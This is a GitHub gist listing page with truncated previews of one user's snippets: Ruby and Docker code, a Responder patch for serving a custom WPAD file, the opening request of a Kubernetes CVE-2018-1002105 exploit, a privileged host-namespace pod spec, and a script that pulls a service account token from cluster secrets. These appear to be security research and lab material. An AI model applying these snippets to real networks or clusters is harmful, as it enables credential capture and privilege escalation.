abhisek
/ apigw_api.rb
Created
April 26, 2017 17:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get '/info' do | |
| @data_service.info.to_json | |
| end |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM node:slim | |
| RUN mkdir /app | |
| ADD . /app | |
| WORKDIR /app | |
| RUN npm install | |
| EXPOSE 8000 | |
| CMD npm start |
abhisek
/ sol-hack-oneliner.rb
Created
September 17, 2017 11:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ruby -r json -r "net/http" -e "puts JSON.parse(Net::HTTP.get_response(URI.parse('http://127.0.0.1:8000/graph.json')).body).map {|e| e[1]['codes']}.flatten.sort.first" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'rubygems' | |
| require 'bundler' | |
| Bundler.require(:default) | |
| require 'nokogiri' | |
| require 'uri' | |
| require 'set' | |
| BASE_URL = 'http://127.0.0.1:8000/' |
abhisek
/ responder-wpad-file-patch
Created
June 19, 2018 05:45
Responder patch to serve wpad.dat from file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/Responder.conf b/Responder.conf | |
| index 4303df6..0d32158 100644 | |
| --- a/Responder.conf | |
| +++ b/Responder.conf | |
| @@ -78,6 +78,8 @@ ExeDownloadName = ProxyClient.exe | |
| ; Custom WPAD Script | |
| WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';} | |
| +WPADScriptFile = /tmp/wpad3.dat | |
| + |
abhisek
/ gist:3ef7f1e208d46771cb79b6440028b787
Created
December 7, 2018 18:14
Kubernetes Exploit CVE-2018–1002105
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1 | |
| Authorization: Bearer $TOKEN | |
| Host: 192.168.12.10:6443 | |
| Connection: upgrade | |
| Upgrade: websocket |
abhisek
/ mongo-api-client.js
Created
July 5, 2019 09:54
Mongo Cloud Atlas Events API to Elasticsearch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const MONGO_ATLAS_USERNAME = 'USER' | |
| const MONGO_ATLAS_APIKEY = 'APIKEY' | |
| const MONGO_ATLAS_STAGING_GROUP_ID = 'ID1' | |
| const MONGO_ATLAS_PRODUCTION_GROUP_ID = 'ID2' | |
| const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Pod | |
| metadata: | |
| labels: | |
| run: ubuntu-1 | |
| name: ubuntu-1 | |
| spec: | |
| hostPID: true | |
| hostIPC: true | |
| hostNetwork: true |
abhisek
/ k8s-sa-pod-crud.yml
Created
March 17, 2020 04:08
Kubernetes Service Account with Pod CRUD Privilege to Single Namespace
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apiVersion: v1 | |
| kind: Namespace | |
| metadata: | |
| name: developers | |
| --- | |
| apiVersion: v1 | |
| kind: ServiceAccount | |
| metadata: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g') | |
| export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}') | |
| export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d) | |
| export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}") | |
| cat <<EOF | |
| apiVersion: v1 | |
| kind: Config |